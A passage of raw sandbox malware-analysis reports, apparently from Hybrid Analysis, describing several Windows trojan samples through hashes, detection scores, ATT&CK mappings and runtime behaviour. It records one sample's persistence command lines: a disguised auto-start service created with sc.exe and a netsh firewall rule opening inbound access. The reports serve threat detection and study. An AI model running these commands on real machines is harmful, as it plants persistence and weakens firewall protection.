80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thdpjd.exe]- [targetUID: 00000000-00006020]\n \"ffpfpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffpfpp.exe]- [targetUID: 00000000-00006020]\n \"vjdhtlv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjdhtlv.exe]- [targetUID: 00000000-00003732]\n \"llrlrrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llrlrrb.exe]- [targetUID: 00000000-00004304]\n \"hrbbfnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrbbfnh.exe]- [targetUID: 00000000-00006028]\n \"xpldnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xpldnr.exe]- [targetUID: 00000000-00006000]\n \"tbbdbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbbdbn.exe]- [targetUID: 00000000-00006000]\n \"nrhhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrhhv.exe]- [targetUID: 00000000-00006120]\n \"jfdjvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jfdjvd.exe]- [targetUID: 00000000-00004268]\n \"04284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04284.exe]- [targetUID: 00000000-00006096]\n \"464446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464446.exe]- [targetUID: 00000000-00006096]\n \"rbffv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbffv.exe]- [targetUID: 00000000-00005780]\n \"jbdtnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbdtnd.exe]- [targetUID: 00000000-00005756]\n \"nxhlxrp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxhlxrp.exe]- [targetUID: 00000000-00005764]\n \"628008.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\628008.exe]- [targetUID: 00000000-00005764]\n \"064260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\064260.exe]- [targetUID: 00000000-00005984]\n \"tfxnptb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfxnptb.exe]- [targetUID: 00000000-00005800]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has section name UPX1 with entropy \"7.97244478673\"\n \"vhxrtdt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bdnnt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pfdblvl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bphhd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jvrbx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"njvhn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"468866.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"664842.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"840664.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"886680.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"404286.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"62664.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ftbltx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xrfjx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jnnxfl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bjdlj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"njhpfx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4824668.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"66446.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"00008.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rhxhth.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tdtflp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nxfnfn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rhnxdp.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has a section named \"UPX0\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has a section named \"UPX1\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has a section named \"UPX2\"\n \"vhxrtdt.exe\" has a section named \"UPX0\"\n \"vhxrtdt.exe\" has a section named \"UPX1\"\n \"vhxrtdt.exe\" has a section named \"UPX2\"\n \"bdnnt.exe\" has a section named \"UPX0\"\n \"bdnnt.exe\" has a section named \"UPX1\"\n \"bdnnt.exe\" has a section named \"UPX2\"\n \"pfdblvl.exe\" has a section named \"UPX0\"\n \"pfdblvl.exe\" has a section named \"UPX1\"\n \"pfdblvl.exe\" has a section named \"UPX2\"\n \"bphhd.exe\" has a section named \"UPX0\"\n \"bphhd.exe\" has a section named \"UPX1\"\n \"bphhd.exe\" has a section named \"UPX2\"\n \"jvrbx.exe\" has a section named \"UPX0\"\n \"jvrbx.exe\" has a section named \"UPX1\"\n \"jvrbx.exe\" has a section named \"UPX2\"\n \"njvhn.exe\" has a section named \"UPX0\"\n \"njvhn.exe\" has a section named \"UPX1\"\n \"njvhn.exe\" has a section named \"UPX2\"\n \"468866.exe\" has a section named \"UPX0\"\n \"468866.exe\" has a section named \"UPX1\"\n \"468866.exe\" has a section named \"UPX2\"\n \"664842.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (UID: 00000000-00005800)\n Spawned process \"tfxnptb.exe\" (UID: 00000000-00005984)\n Spawned process \"064260.exe\" (UID: 00000000-00006008)\n Spawned process \"628008.exe\" (UID: 00000000-00005764)\n Spawned process \"nxhlxrp.exe\" (UID: 00000000-00005776)\n Spawned process \"jbdtnd.exe\" (UID: 00000000-00005756)\n Spawned process \"rbffv.exe\" (UID: 00000000-00005780)\n Spawned process \"464446.exe\" (UID: 00000000-00006096)\n Spawned process \"04284.exe\" (UID: 00000000-00004268)\n Spawned process \"jfdjvd.exe\" (UID: 00000000-00006124)\n Spawned process \"nrhhv.exe\" (UID: 00000000-00006120)\n Spawned process \"tbbdbn.exe\" (UID: 00000000-00006000)\n Spawned process \"xpldnr.exe\" (UID: 00000000-00006028)\n Spawned process \"hrbbfnh.exe\" (UID: 00000000-00004132)\n Spawned process \"llrlrrb.exe\" (UID: 00000000-00004304)\n Spawned process \"vjdhtlv.exe\" (UID: 00000000-00003732)\n Spawned process \"ffpfpp.exe\" (UID: 00000000-00006020)\n Spawned process \"thdpjd.exe\" (UID: 00000000-00004172)\n Spawned process \"00688.exe\" (UID: 00000000-00003708)\n Spawned process \"8644820.exe\" (UID: 00000000-00000772)\n Spawned process \"2022484.exe\" (UID: 00000000-00003872)\n Spawned process \"rvbjvln.exe\" (UID: 00000000-00004368)\n Spawned process \"ldnfnvr.exe\" (UID: 00000000-00001904)\n Spawned process \"httbh.exe\" (UID: 00000000-00001888)\n Spawned process \"jnnjf.exe\" (UID: 00000000-00001896)\n Spawned process \"bnxtdj.exe\" (UID: 00000000-00004324)\n Spawned process \"rbppd.exe\" (UID: 00000000-00003840)\n Spawned process \"nnpbn.exe\" (UID: 00000000-00004076)\n Spawned process \"6824004.exe\" (UID: 00000000-00001908)\n Spawned process \"08466.exe\" (UID: 00000000-00003696)\n Spawned process \"8822846.exe\" (UID: 00000000-00003040)\n Spawned process \"dnhpbvd.exe\" (UID: 00000000-00002256)\n Spawned process \"fxlrjhd.exe\" (UID: 00000000-00002076)\n Spawned process \"fxxdb.exe\" (UID: 00000000-00002768)\n Spawned process \"lbdtbf.exe\" (UID: 00000000-00001184)\n Spawned process \"482088.exe\" (UID: 00000000-00003256)\n Spawned process \"0604428.exe\" (UID: 00000000-00003568)\n Spawned process \"jlvlb.exe\" (UID: 00000000-00003672)\n Spawned process \"lpnpn.exe\" (UID: 00000000-00002888)\n Spawned process \"dnjtl.exe\" (UID: 00000000-00003972)\n Spawned process \"lvdfpxj.exe\" (UID: 00000000-00004432)\n Spawned process \"jnbhhn.exe\" (UID: 00000000-00001740)\n Spawned process \"hbbtpvh.exe\" (UID: 00000000-00004200)\n Spawned process \"hnndln.exe\" (UID: 00000000-00001708)\n Spawned process \"blpvx.exe\" (UID: 00000000-00003492)\n Spawned process \"8064284.exe\" (UID: 00000000-00001744)\n Spawned process \"68606.exe\" (UID: 00000000-00004400)\n Spawned process \"02684.exe\" (UID: 00000000-00003200)\n Spawned process \"0888688.exe\" (UID: 00000000-00000484)\n Spawned process \"8080842.exe\" (UID: 00000000-00001468)\n Spawned process \"0002220.exe\" (UID: 00000000-00001544)\n Spawned process \"604424.exe\" (UID: 00000000-00003544)\n Spawned process \"pdhnj.exe\" (UID: 00000000-00003636)\n Spawned process \"rhnxdp.exe\" (UID: 00000000-00002144)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" wrote 32 bytes to a remote process \"C:\\tfxnptb.exe\" (Handle: 68)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" wrote 52 bytes to a remote process \"C:\\tfxnptb.exe\" (Handle: 68)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" wrote 4 bytes to a remote process \"C:\\tfxnptb.exe\" (Handle: 68)\n \"tfxnptb.exe\" wrote 32 bytes to a remote process \"C:\\064260.exe\" (Handle: 68)\n \"tfxnptb.exe\" wrote 52 bytes to a remote process \"C:\\064260.exe\" (Handle: 68)\n \"tfxnptb.exe\" wrote 4 bytes to a remote process \"C:\\064260.exe\" (Handle: 68)\n \"064260.exe\" wrote 32 bytes to a remote process \"C:\\628008.exe\" (Handle: 116)\n \"064260.exe\" wrote 52 bytes to a remote process \"C:\\628008.exe\" (Handle: 116)\n \"064260.exe\" wrote 4 bytes to a remote process \"C:\\628008.exe\" (Handle: 116)\n \"628008.exe\" wrote 32 bytes to a remote process \"C:\\nxhlxrp.exe\" (Handle: 68)\n \"628008.exe\" wrote 52 bytes to a remote process \"C:\\nxhlxrp.exe\" (Handle: 68)\n \"628008.exe\" wrote 4 bytes to a remote process \"C:\\nxhlxrp.exe\" (Handle: 68)\n \"nxhlxrp.exe\" wrote 32 bytes to a remote process \"C:\\jbdtnd.exe\" (Handle: 68)\n \"nxhlxrp.exe\" wrote 52 bytes to a remote process \"C:\\jbdtnd.exe\" (Handle: 68)\n \"nxhlxrp.exe\" wrote 4 bytes to a remote process \"C:\\jbdtnd.exe\" (Handle: 68)\n \"jbdtnd.exe\" wrote 32 bytes to a remote process \"C:\\rbffv.exe\" (Handle: 116)\n \"jbdtnd.exe\" wrote 52 bytes to a remote process \"C:\\rbffv.exe\" (Handle: 116)\n \"jbdtnd.exe\" wrote 4 bytes to a remote process \"C:\\rbffv.exe\" (Handle: 116)\n \"rbffv.exe\" wrote 32 bytes to a remote process \"C:\\464446.exe\" (Handle: 68)\n \"rbffv.exe\" wrote 52 bytes to a remote process \"C:\\464446.exe\" (Handle: 68)\n \"rbffv.exe\" wrote 4 bytes to a remote process \"C:\\464446.exe\" (Handle: 68)\n \"464446.exe\" wrote 32 bytes to a remote process \"C:\\04284.exe\" (Handle: 116)\n \"464446.exe\" wrote 52 bytes to a remote process \"C:\\04284.exe\" (Handle: 116)\n \"464446.exe\" wrote 4 bytes to a remote process \"C:\\04284.exe\" (Handle: 116)\n \"04284.exe\" wrote 32 bytes to a remote process \"C:\\jfdjvd.exe\" (Handle: 116)\n \"04284.exe\" wrote 52 bytes to a remote process \"C:\\jfdjvd.exe\" (Handle: 116)\n \"04284.exe\" wrote 4 bytes to a remote process \"C:\\jfdjvd.exe\" (Handle: 116)\n \"jfdjvd.exe\" wrote 32 bytes to a remote process \"C:\\nrhhv.exe\" (Handle: 68)\n \"jfdjvd.exe\" wrote 52 bytes to a remote process \"C:\\nrhhv.exe\" (Handle: 68)\n \"jfdjvd.exe\" wrote 4 bytes to a remote process \"C:\\nrhhv.exe\" (Handle: 68)\n \"nrhhv.exe\" wrote 32 bytes to a remote process \"C:\\tbbdbn.exe\" (Handle: 68)\n \"nrhhv.exe\" wrote 52 bytes to a remote process \"C:\\tbbdbn.exe\" (Handle: 68)\n \"nrhhv.exe\" wrote 4 bytes to a remote process \"C:\\tbbdbn.exe\" (Handle: 68)\n \"tbbdbn.exe\" wrote 32 bytes to a remote process \"C:\\xpldnr.exe\" (Handle: 68)\n \"tbbdbn.exe\" wrote 52 bytes to a remote process \"C:\\xpldnr.exe\" (Handle: 68)\n \"tbbdbn.exe\" wrote 4 bytes to a remote process \"C:\\xpldnr.exe\" (Handle: 68)\n \"xpldnr.exe\" wrote 32 bytes to a remote process \"C:\\hrbbfnh.exe\" (Handle: 116)\n \"xpldnr.exe\" wrote 52 bytes to a remote process \"C:\\hrbbfnh.exe\" (Handle: 116)\n \"xpldnr.exe\" wrote 4 bytes to a remote process \"C:\\hrbbfnh.exe\" (Handle: 116)\n \"hrbbfnh.exe\" wrote 32 bytes to a remote process \"C:\\llrlrrb.exe\" (Handle: 116)\n \"hrbbfnh.exe\" wrote 52 bytes to a remote process \"C:\\llrlrrb.exe\" (Handle: 116)\n \"hrbbfnh.exe\" wrote 4 bytes to a remote process \"C:\\llrlrrb.exe\" (Handle: 116)\n \"llrlrrb.exe\" wrote 32 bytes to a remote process \"C:\\vjdhtlv.exe\" (Handle: 116)\n \"llrlrrb.exe\" wrote 52 bytes to a remote process \"C:\\vjdhtlv.exe\" (Handle: 116)\n \"llrlrrb.exe\" wrote 4 bytes to a remote process \"C:\\vjdhtlv.exe\" (Handle: 116)\n \"vjdhtlv.exe\" wrote 32 bytes to a remote process \"C:\\ffpfpp.exe\" (Handle: 120)\n \"vjdhtlv.exe\" wrote 52 bytes to a remote process \"C:\\ffpfpp.exe\" (Handle: 120)\n \"vjdhtlv.exe\" wrote 4 bytes to a remote process \"C:\\ffpfpp.exe\" (Handle: 120)\n \"ffpfpp.exe\" wrote 32 bytes to a remote process \"C:\\thdpjd.exe\" (Handle: 68)\n \"ffpfpp.exe\" wrote 52 bytes to a remote process \"C:\\thdpjd.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"fxlrjhd.exe\" allocated memory in \"c:\\fxlrjhd.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0
https://hybrid-analysis.com/sample/e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0
Hybrid Analysis - Um_unhooking
{"size": 757760, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "PICUS_e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0.exe", "sha256": "e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0", "av_detect": 83, "vx_family": "Trojan.Generic", "threat_score": 62, "threat_level": 2, "verdict": "malicious", "total_processes": 1, "total_signatures": 12, "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)", "10 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)"], "imported_objects": ["5 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)", "11 .C Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)", "4 .OBJ Files (COFF) linked with LINK.EXE 5.12 (Visual Studio 5 SP2) (build: 8034)"], "file_analysis": ["File contains C++ code", "File is the product of a small codebase (10 files)"], "total_file_compositions_imports": 342}, "processes": [{"uid": "00044311-00002956", "name": "PICUS_e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0.exe", "normalized_path": "C:\\PICUS_e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0.exe", "sha256": "e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0", "av_label": "Trojan.TXGH", "av_matched": 3, "av_total": 14}], "mitre_attcks": [{"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1215", "attck_id_wiki": "https://attack.mitre.org/wiki/Technique/T1215", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1076", "attck_id_wiki": "https://attack.mitre.org/wiki/Technique/T1076", "suspicious_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Data Compressed", "attck_id": "T1002", "attck_id_wiki": "https://attack.mitre.org/wiki/Technique/T1002", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"PICUS_e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0.exe.bin\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1002", "attck_id_wiki": "https://attack.mitre.org/wiki/Technique/T1002"}, {"threat_level_human": "informative", "category": "Installation/Persistance", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"<Input Sample>\" connecting to \"\\ThemeApiPort\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistance", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"<Input Sample>\" touched file \"%WINDIR%\\System32\\en-US\\odbcint.dll.mui\"\n \"<Input Sample>\" touched file \"%WINDIR%\\System32\\en-US\\MFC42.dll.mui\"\n \"<Input Sample>\" touched file \"%WINDIR%\\System32\\ntdll.dll\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"<Input Sample>\" opened \"\\Device\\KsecDD\"", "origin": "API Call", "attck_id": "T1215", "attck_id_wiki": "https://attack.mitre.org/wiki/Technique/T1215"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "GetStartupInfoA\n GetProcAddress\n GetModuleHandleA\n GetModuleHandleW", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"PICUS_e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0.exe.bin\" claimed CRC 354997 while the actual is CRC 763389", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 10, "name": "PE file has unusual entropy sections", "description": ".monor with unusual entropies 7.70282429977", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "registry-61", "type": 3, "relevance": 10, "name": "Reads terminal service related keys (often RDP related)", "description": "\"<Input Sample>\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\")", "origin": "Registry Access", "attck_id": "T1076", "capec_id": "CAPEC-555", "attck_id_wiki": "https://attack.mitre.org/wiki/Technique/T1076"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "stream-36", "type": 1, "relevance": 9, "name": "Tries to hide a procedure lookup using single characters", "description": "Found a lot of single characters ('2','2','V','i','r','t','u','a','l','P','r','o','t','e','c','t','k','e','r','n','e','l','3','2','.','d','l','l') being pushed to stack and GetProcAddress@KERNEL32.dll in the same context (relevant concatenated strings: 'VirtualProtect','kernel32.dll') at: 43364-448-0040148B\n Found a lot of single characters ('2','V','i','r','t','u','a','l','P','r','o','t','e','c','t','k','e','r','n','e','l','3','2','.','d','l','l') being pushed to stack and GetProcAddress@KERNEL32.DLL in the same context (relevant concatenated strings: 'VirtualProtect','kernel32.dll') at: 00044311-00002956-51494-59-0040148B", "origin": "Hybrid Analysis Technology"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-5", "type": 12, "relevance": 5, "name": "Sample was identified as malicious by a trusted Antivirus engine", "description": "No specific details available", "origin": "External System"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-0", "type": 12, "relevance": 8, "name": "Sample was identified as malicious by at least one Antivirus engine", "description": "3/14 Antivirus vendors marked sample as malicious (21% detection rate)", "origin": "External System"}]}
5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf
https://hybrid-analysis.com/sample/5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf
Hybrid Analysis - Um_unhooking
{"size": 15339008, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf", "sha256": "5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 8, "total_processes": 9, "total_signatures": 237, "extracted_files": [{"name": "hdvvshgu.exe", "file_path": "%TEMP%\\hdvvshgu.exe", "file_size": 5242368, "sha256": "81b779cb84cbf130a62ac4e2cfbbad440d778b45876d44e4111e3312d16eaccd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe (PID: 4580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hdvvshgu.exe.67B73BFE.bin", "file_size": 11791872, "sha256": "2c1431b669a2dfdfe516aa66bc6c1c8ad9d992dfcafe47c6ed73663511010b1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00004580", "name": "5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe", "normalized_path": "C:\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe", "sha256": "5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf"}, {"uid": "00000000-00005596", "parentuid": "00000000-00004580", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\tpxhoiko\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004648", "parentuid": "00000000-00004580", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\hdvvshgu.exe\" %WINDIR%\\system32\\tpxhoiko\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005332", "parentuid": "00000000-00004580", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create tpxhoiko binPath= \"%WINDIR%\\system32\\tpxhoiko\\hdvvshgu.exe /d\\\"C:\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005808", "parentuid": "00000000-00004580", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description tpxhoiko \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005676", "parentuid": "00000000-00004580", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start tpxhoiko", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004152", "parentuid": "00000000-00004580", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00005776", "name": "hdvvshgu.exe", "normalized_path": "%WINDIR%\\system32\\tpxhoiko\\hdvvshgu.exe", "command_line": "/d\"C:\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\"", "sha256": "2c1431b669a2dfdfe516aa66bc6c1c8ad9d992dfcafe47c6ed73663511010b1c"}, {"uid": "00000000-00006128", "parentuid": "00000000-00005776", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": 